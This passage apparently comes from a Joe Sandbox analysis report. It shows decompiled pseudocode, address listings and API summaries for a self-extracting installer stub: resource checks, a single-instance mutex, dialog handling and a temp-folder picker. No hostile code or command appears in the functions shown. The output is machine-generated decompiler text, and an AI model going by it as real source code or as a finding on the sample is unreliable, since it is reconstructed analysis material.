                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                      					 *0x3e858c = _t27;
                                                                                                                                                                                                      					SetEvent(_t27);
                                                                                                                                                                                                      					_t64 = 0x3e9a34;
                                                                                                                                                                                                      					if(E003E468F("EXTRACTOPT", 0x3e9a34, 4) != 0) {
                                                                                                                                                                                                      						if(( *0x3e9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                      							L12:
                                                                                                                                                                                                      							 *0x3e9120 =  *0x3e9120 & _t65;
                                                                                                                                                                                                      							if(E003E5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                      								if( *0x3e8a3a == 0) {
                                                                                                                                                                                                      									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                      									if(_t31 != 0) {
                                                                                                                                                                                                      										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0x3e8184 != 0) {
                                                                                                                                                                                                      										__imp__#17();
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if( *0x3e8a24 == 0) {
                                                                                                                                                                                                      										_t57 = _t65;
                                                                                                                                                                                                      										if(E003E36EE(_t65) == 0) {
                                                                                                                                                                                                      											goto L33;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t33 =  *0x3e9a40; // 0x3
                                                                                                                                                                                                      											_t48 = 1;
                                                                                                                                                                                                      											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                      												if(( *0x3e9a34 & 0x00000100) == 0 || ( *0x3e8a38 & 0x00000001) != 0 || E003E18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                      													goto L30;
                                                                                                                                                                                                      												} else {
                                                                                                                                                                                                      													_t64 = 0x7d6;
                                                                                                                                                                                                      													if(E003E6517(_t57, 0x7d6, _t34, E003E19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                      														goto L33;
                                                                                                                                                                                                      													} else {
                                                                                                                                                                                                      														goto L30;
                                                                                                                                                                                                      													}
                                                                                                                                                                                                      												}
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												L30:
                                                                                                                                                                                                      												_t23 = _t48;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t23 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									E003E2390(0x3e8a3a);
                                                                                                                                                                                                      									goto L33;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t64 = 0x520;
                                                                                                                                                                                                      								L32:
                                                                                                                                                                                                      								E003E44B9(0, _t64, 0, 0, 0x10, 0);
                                                                                                                                                                                                      								goto L33;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t64 =  &_v268;
                                                                                                                                                                                                      							if(E003E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                                                                                                                                                                                                      								goto L3;
                                                                                                                                                                                                      							} else {
                                                                                                                                                                                                      								_t43 = CreateMutexA(0, 1,  &_v268);
                                                                                                                                                                                                      								 *0x3e8588 = _t43;
                                                                                                                                                                                                      								if(_t43 == 0 || GetLastError() != 0xb7) {
                                                                                                                                                                                                      									goto L12;
                                                                                                                                                                                                      								} else {
                                                                                                                                                                                                      									if(( *0x3e9a34 & 0x00000080) == 0) {
                                                                                                                                                                                                      										_t64 = 0x524;
                                                                                                                                                                                                      										if(E003E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                                                                                                                                                                                                      											goto L12;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L11;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t64 = 0x54b;
                                                                                                                                                                                                      										E003E44B9(0, 0x54b, "cent", 0, 0x10, 0);
                                                                                                                                                                                                      										L11:
                                                                                                                                                                                                      										CloseHandle( *0x3e8588);
                                                                                                                                                                                                      										 *0x3e9124 = 0x800700b7;
                                                                                                                                                                                                      										goto L33;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						L3:
                                                                                                                                                                                                      						_t64 = 0x4b1;
                                                                                                                                                                                                      						E003E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						 *0x3e9124 = 0x80070714;
                                                                                                                                                                                                      						L33:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E003E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x003e2cb5
                                                                                                                                                                                                      0x003e2cbc
                                                                                                                                                                                                      0x003e2cc7
                                                                                                                                                                                                      0x003e2cc9
                                                                                                                                                                                                      0x003e2cd1
                                                                                                                                                                                                      0x003e2cd3
                                                                                                                                                                                                      0x003e2cd9
                                                                                                                                                                                                      0x003e2ce9
                                                                                                                                                                                                      0x003e2cf9
                                                                                                                                                                                                      0x003e2d0e
                                                                                                                                                                                                      0x003e2d15
                                                                                                                                                                                                      0x003e2d1c
                                                                                                                                                                                                      0x003e2ef3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2d2d
                                                                                                                                                                                                      0x003e2d34
                                                                                                                                                                                                      0x003e2d3b
                                                                                                                                                                                                      0x003e2d40
                                                                                                                                                                                                      0x003e2d48
                                                                                                                                                                                                      0x003e2d59
                                                                                                                                                                                                      0x003e2d84
                                                                                                                                                                                                      0x003e2e1f
                                                                                                                                                                                                      0x003e2e1f
                                                                                                                                                                                                      0x003e2e2e
                                                                                                                                                                                                      0x003e2e41
                                                                                                                                                                                                      0x003e2e5a
                                                                                                                                                                                                      0x003e2e62
                                                                                                                                                                                                      0x003e2e6c
                                                                                                                                                                                                      0x003e2e6c
                                                                                                                                                                                                      0x003e2e75
                                                                                                                                                                                                      0x003e2e77
                                                                                                                                                                                                      0x003e2e77
                                                                                                                                                                                                      0x003e2e84
                                                                                                                                                                                                      0x003e2e8b
                                                                                                                                                                                                      0x003e2e94
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2e96
                                                                                                                                                                                                      0x003e2e96
                                                                                                                                                                                                      0x003e2e9e
                                                                                                                                                                                                      0x003e2ea2
                                                                                                                                                                                                      0x003e2eba
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2ece
                                                                                                                                                                                                      0x003e2ede
                                                                                                                                                                                                      0x003e2eed
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2eed
                                                                                                                                                                                                      0x003e2eef
                                                                                                                                                                                                      0x003e2eef
                                                                                                                                                                                                      0x003e2eef
                                                                                                                                                                                                      0x003e2eef
                                                                                                                                                                                                      0x003e2ea2
                                                                                                                                                                                                      0x003e2e86
                                                                                                                                                                                                      0x003e2e88
                                                                                                                                                                                                      0x003e2e88
                                                                                                                                                                                                      0x003e2e43
                                                                                                                                                                                                      0x003e2e48
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2e48
                                                                                                                                                                                                      0x003e2e30
                                                                                                                                                                                                      0x003e2e30
                                                                                                                                                                                                      0x003e2ef8
                                                                                                                                                                                                      0x003e2f01
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2f01
                                                                                                                                                                                                      0x003e2d8a
                                                                                                                                                                                                      0x003e2d8f
                                                                                                                                                                                                      0x003e2da1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2da3
                                                                                                                                                                                                      0x003e2dae
                                                                                                                                                                                                      0x003e2db4
                                                                                                                                                                                                      0x003e2dbb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2dca
                                                                                                                                                                                                      0x003e2dd3
                                                                                                                                                                                                      0x003e2df5
                                                                                                                                                                                                      0x003e2e02
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2dd5
                                                                                                                                                                                                      0x003e2dde
                                                                                                                                                                                                      0x003e2de3
                                                                                                                                                                                                      0x003e2e04
                                                                                                                                                                                                      0x003e2e0a
                                                                                                                                                                                                      0x003e2e10
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e2e10
                                                                                                                                                                                                      0x003e2dd3
                                                                                                                                                                                                      0x003e2dbb
                                                                                                                                                                                                      0x003e2da1
                                                                                                                                                                                                      0x003e2d5b
                                                                                                                                                                                                      0x003e2d5b
                                                                                                                                                                                                      0x003e2d5d
                                                                                                                                                                                                      0x003e2d69
                                                                                                                                                                                                      0x003e2d6e
                                                                                                                                                                                                      0x003e2f06
                                                                                                                                                                                                      0x003e2f06
                                                                                                                                                                                                      0x003e2f06
                                                                                                                                                                                                      0x003e2d59
                                                                                                                                                                                                      0x003e2f18

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2CD9
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2CE9
                                                                                                                                                                                                      • memset.MSVCRT ref: 003E2CF9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46A0
                                                                                                                                                                                                        • Part of subcall function 003E468F: SizeofResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46A9
                                                                                                                                                                                                        • Part of subcall function 003E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003E46C3
                                                                                                                                                                                                        • Part of subcall function 003E468F: LoadResource.KERNEL32(00000000,00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46CC
                                                                                                                                                                                                        • Part of subcall function 003E468F: LockResource.KERNEL32(00000000,?,003E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46D3
                                                                                                                                                                                                        • Part of subcall function 003E468F: memcpy_s.MSVCRT ref: 003E46E5
                                                                                                                                                                                                        • Part of subcall function 003E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003E46EF
                                                                                                                                                                                                      • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2D34
                                                                                                                                                                                                      • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2D40
                                                                                                                                                                                                      • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2DAE
                                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 003E2DBD
                                                                                                                                                                                                      • CloseHandle.KERNEL32(cent,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 003E2E0A
                                                                                                                                                                                                        • Part of subcall function 003E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003E4518
                                                                                                                                                                                                        • Part of subcall function 003E44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 003E4554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$cent
                                                                                                                                                                                                      • API String ID: 1002816675-2654900392
                                                                                                                                                                                                      • Opcode ID: ac7ab994a5c2b1a37de191caa83ea5eb51865bb89c664167d6cec9451cb3eb35
                                                                                                                                                                                                      • Instruction ID: 8b7a3069b3abacada9e2d811182e0a48f07a53a649a4a7d927f09baafbf79fee
                                                                                                                                                                                                      • Opcode Fuzzy Hash: ac7ab994a5c2b1a37de191caa83ea5eb51865bb89c664167d6cec9451cb3eb35
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC51B4707403F1AAE737AB239C8ABBB269CDB85700F01473AFA45DD2D1DAB49C419711
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 81%
                                                                                                                                                                                                      			E003E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t17;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t25;
                                                                                                                                                                                                      				struct HWND__* _t35;
                                                                                                                                                                                                      				struct HWND__* _t38;
                                                                                                                                                                                                      				void* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t9 = _a8 - 0x10;
                                                                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                                                                      					__eflags = 1;
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					 *0x3e91d8 = 1;
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					_push(_a4);
                                                                                                                                                                                                      					L21:
                                                                                                                                                                                                      					EndDialog();
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				_pop(1);
                                                                                                                                                                                                      				_t12 = _t9 - 0xf2;
                                                                                                                                                                                                      				if(_t12 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 0x1b;
                                                                                                                                                                                                      					if(_a12 != 0x1b) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L19;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t13 = _t12 - 0xe;
                                                                                                                                                                                                      				if(_t13 == 0) {
                                                                                                                                                                                                      					_t35 = _a4;
                                                                                                                                                                                                      					 *0x3e8584 = _t35;
                                                                                                                                                                                                      					E003E43D0(_t35, GetDesktopWindow());
                                                                                                                                                                                                      					__eflags =  *0x3e8184; // 0x1
                                                                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                                                                                                                                                                                                      						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetWindowTextA(_t35, "cent");
                                                                                                                                                                                                      					_t17 = CreateThread(0, 0, E003E4FE0, 0, 0, 0x3e8798);
                                                                                                                                                                                                      					 *0x3e879c = _t17;
                                                                                                                                                                                                      					__eflags = _t17;
                                                                                                                                                                                                      					if(_t17 != 0) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						E003E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t35);
                                                                                                                                                                                                      						goto L21;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t23 = _t13 - 1;
                                                                                                                                                                                                      				if(_t23 == 0) {
                                                                                                                                                                                                      					__eflags = _a12 - 2;
                                                                                                                                                                                                      					if(_a12 != 2) {
                                                                                                                                                                                                      						goto L22;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					ResetEvent( *0x3e858c);
                                                                                                                                                                                                      					_t38 =  *0x3e8584; // 0x0
                                                                                                                                                                                                      					_t25 = E003E44B9(_t38, 0x4b2, 0x3e1140, 0, 0x20, 4);
                                                                                                                                                                                                      					__eflags = _t25 - 6;
                                                                                                                                                                                                      					if(_t25 == 6) {
                                                                                                                                                                                                      						L11:
                                                                                                                                                                                                      						 *0x3e91d8 = 1;
                                                                                                                                                                                                      						SetEvent( *0x3e858c);
                                                                                                                                                                                                      						_t39 =  *0x3e879c; // 0x0
                                                                                                                                                                                                      						E003E3680(_t39);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__eflags = _t25 - 1;
                                                                                                                                                                                                      					if(_t25 == 1) {
                                                                                                                                                                                                      						goto L11;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					SetEvent( *0x3e858c);
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t23 == 0xe90) {
                                                                                                                                                                                                      					TerminateThread( *0x3e879c, 0);
                                                                                                                                                                                                      					EndDialog(_a4, _a12);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      0x003e34fb
                                                                                                                                                                                                      0x003e34fe
                                                                                                                                                                                                      0x003e3665
                                                                                                                                                                                                      0x003e3666
                                                                                                                                                                                                      0x003e3666
                                                                                                                                                                                                      0x003e3668
                                                                                                                                                                                                      0x003e366e
                                                                                                                                                                                                      0x003e366e
                                                                                                                                                                                                      0x003e3671
                                                                                                                                                                                                      0x003e3671
                                                                                                                                                                                                      0x003e3677
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3677
                                                                                                                                                                                                      0x003e3504
                                                                                                                                                                                                      0x003e3506
                                                                                                                                                                                                      0x003e3507
                                                                                                                                                                                                      0x003e350c
                                                                                                                                                                                                      0x003e365b
                                                                                                                                                                                                      0x003e365f
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3661
                                                                                                                                                                                                      0x003e3512
                                                                                                                                                                                                      0x003e3515
                                                                                                                                                                                                      0x003e35be
                                                                                                                                                                                                      0x003e35c1
                                                                                                                                                                                                      0x003e35d1
                                                                                                                                                                                                      0x003e35d8
                                                                                                                                                                                                      0x003e35de
                                                                                                                                                                                                      0x003e35f8
                                                                                                                                                                                                      0x003e3617
                                                                                                                                                                                                      0x003e3617
                                                                                                                                                                                                      0x003e3623
                                                                                                                                                                                                      0x003e3637
                                                                                                                                                                                                      0x003e363d
                                                                                                                                                                                                      0x003e3642
                                                                                                                                                                                                      0x003e3644
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3646
                                                                                                                                                                                                      0x003e3652
                                                                                                                                                                                                      0x003e3657
                                                                                                                                                                                                      0x003e3658
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3658
                                                                                                                                                                                                      0x003e3644
                                                                                                                                                                                                      0x003e351b
                                                                                                                                                                                                      0x003e351d
                                                                                                                                                                                                      0x003e354f
                                                                                                                                                                                                      0x003e3553
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e355f
                                                                                                                                                                                                      0x003e3565
                                                                                                                                                                                                      0x003e357c
                                                                                                                                                                                                      0x003e3581
                                                                                                                                                                                                      0x003e3584
                                                                                                                                                                                                      0x003e359b
                                                                                                                                                                                                      0x003e35a1
                                                                                                                                                                                                      0x003e35a7
                                                                                                                                                                                                      0x003e35ad
                                                                                                                                                                                                      0x003e35b3
                                                                                                                                                                                                      0x003e35b8
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e35b8
                                                                                                                                                                                                      0x003e3586
                                                                                                                                                                                                      0x003e3588
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3590
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3590
                                                                                                                                                                                                      0x003e3524
                                                                                                                                                                                                      0x003e3535
                                                                                                                                                                                                      0x003e3541
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e3549
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • TerminateThread.KERNEL32(00000000), ref: 003E3535
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 003E3541
                                                                                                                                                                                                      • ResetEvent.KERNEL32 ref: 003E355F
                                                                                                                                                                                                      • SetEvent.KERNEL32(003E1140,00000000,00000020,00000004), ref: 003E3590
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 003E35C7
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 003E35F1
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 003E35F8
                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000083B), ref: 003E3610
                                                                                                                                                                                                      • SendMessageA.USER32(00000000), ref: 003E3617
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 003E3623
                                                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,Function_00004FE0,00000000,00000000,003E8798), ref: 003E3637
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 003E3671
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000001.00000002.436245318.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000001.00000002.436227049.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436296879.00000000003E8000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000001.00000002.436318201.00000000003EC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_3e0000_shS06Up82.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 2406144884-3940384054
                                                                                                                                                                                                      • Opcode ID: 7bb3d1d24cdae74013f9de29e66444b73de563d3eba53e43c756fc33873431de
                                                                                                                                                                                                      • Instruction ID: ba89ae99a944bb1e7f2896e5b8eb2baa725d8ee550040bc414cf0975df1fbbe2
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7bb3d1d24cdae74013f9de29e66444b73de563d3eba53e43c756fc33873431de
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 763191316402E0BBD7331F36ACCDE6A3A6DE786B01F114B29F6069E2E0CA719900DB51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                                                                      			E003E4224(char __ecx) {
                                                                                                                                                                                                      				char* _v8;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				char* _v28;
                                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                                      				intOrPtr _v36;
                                                                                                                                                                                                      				intOrPtr _v40;
                                                                                                                                                                                                      				char _v44;
                                                                                                                                                                                                      				char _v48;
                                                                                                                                                                                                      				char _v52;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                      				char _t42;
                                                                                                                                                                                                      				char* _t44;
                                                                                                                                                                                                      				char* _t61;
                                                                                                                                                                                                      				void* _t63;
                                                                                                                                                                                                      				char* _t65;
                                                                                                                                                                                                      				struct HINSTANCE__* _t66;
                                                                                                                                                                                                      				char _t67;
                                                                                                                                                                                                      				void* _t71;
                                                                                                                                                                                                      				char _t76;
                                                                                                                                                                                                      				intOrPtr _t85;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t67 = __ecx;
                                                                                                                                                                                                      				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                      				if(_t66 == 0) {
                                                                                                                                                                                                      					_t63 = 0x4c2;
                                                                                                                                                                                                      					L22:
                                                                                                                                                                                                      					E003E44B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                      				_v12 = _t26;
                                                                                                                                                                                                      				if(_t26 == 0) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t63 = 0x4c1;
                                                                                                                                                                                                      					goto L22;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                      				_v20 = _t28;
                                                                                                                                                                                                      				if(_t28 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                      				_v16 = _t29;
                                                                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t76 =  *0x3e88c0; // 0x0
                                                                                                                                                                                                      				if(_t76 != 0) {
                                                                                                                                                                                                      					L10:
                                                                                                                                                                                                      					 *0x3e87a0 = 0;
                                                                                                                                                                                                      					_v52 = _t67;
                                                                                                                                                                                                      					_v48 = 0;
                                                                                                                                                                                                      					_v44 = 0;
                                                                                                                                                                                                      					_v40 = 0x3e8598;
                                                                                                                                                                                                      					_v36 = 1;
                                                                                                                                                                                                      					_v32 = E003E4200;
                                                                                                                                                                                                      					_v28 = 0x3e88c0;
                                                                                                                                                                                                      					 *0x3ea288( &_v52);
                                                                                                                                                                                                      					_t32 =  *_v12();
                                                                                                                                                                                                      					if(_t71 != _t71) {
                                                                                                                                                                                                      						asm("int 0x29");
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_v12 = _t32;
                                                                                                                                                                                                      					if(_t32 != 0) {
                                                                                                                                                                                                      						 *0x3ea288(_t32, 0x3e88c0);
                                                                                                                                                                                                      						 *_v16();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						if( *0x3e88c0 != 0) {
                                                                                                                                                                                                      							E003E1680(0x3e87a0, 0x104, 0x3e88c0);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0x3ea288(_v12);
                                                                                                                                                                                                      						 *_v20();
                                                                                                                                                                                                      						if(_t71 != _t71) {
                                                                                                                                                                                                      							asm("int 0x29");
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t66);
                                                                                                                                                                                                      					_t85 =  *0x3e87a0; // 0x0
                                                                                                                                                                                                      					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					GetTempPathA(0x104, 0x3e88c0);
                                                                                                                                                                                                      					_t61 = 0x3e88c0;
                                                                                                                                                                                                      					_t4 =  &(_t61[1]); // 0x3e88c1
                                                                                                                                                                                                      					_t65 = _t4;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t42 =  *_t61;
                                                                                                                                                                                                      						_t61 =  &(_t61[1]);
                                                                                                                                                                                                      					} while (_t42 != 0);
                                                                                                                                                                                                      					_t5 = _t61 - _t65 + 0x3e88c0; // 0x7d1181
                                                                                                                                                                                                      					_t44 = CharPrevA(0x3e88c0, _t5);
                                                                                                                                                                                                      					_v8 = _t44;
                                                                                                                                                                                                      					if( *_t44 == 0x5c &&  *(CharPrevA(0x3e88c0, _t44)) != 0x3a) {
                                                                                                                                                                                                      						 *_v8 = 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L10;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}




























                                                                                                                                                                                                      0x003e4234
                                                                                                                                                                                                      0x003e423c
                                                                                                                                                                                                      0x003e4240
                                                                                                                                                                                                      0x003e43b2
                                                                                                                                                                                                      0x003e43b7
                                                                                                                                                                                                      0x003e43c0
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x003e43c5
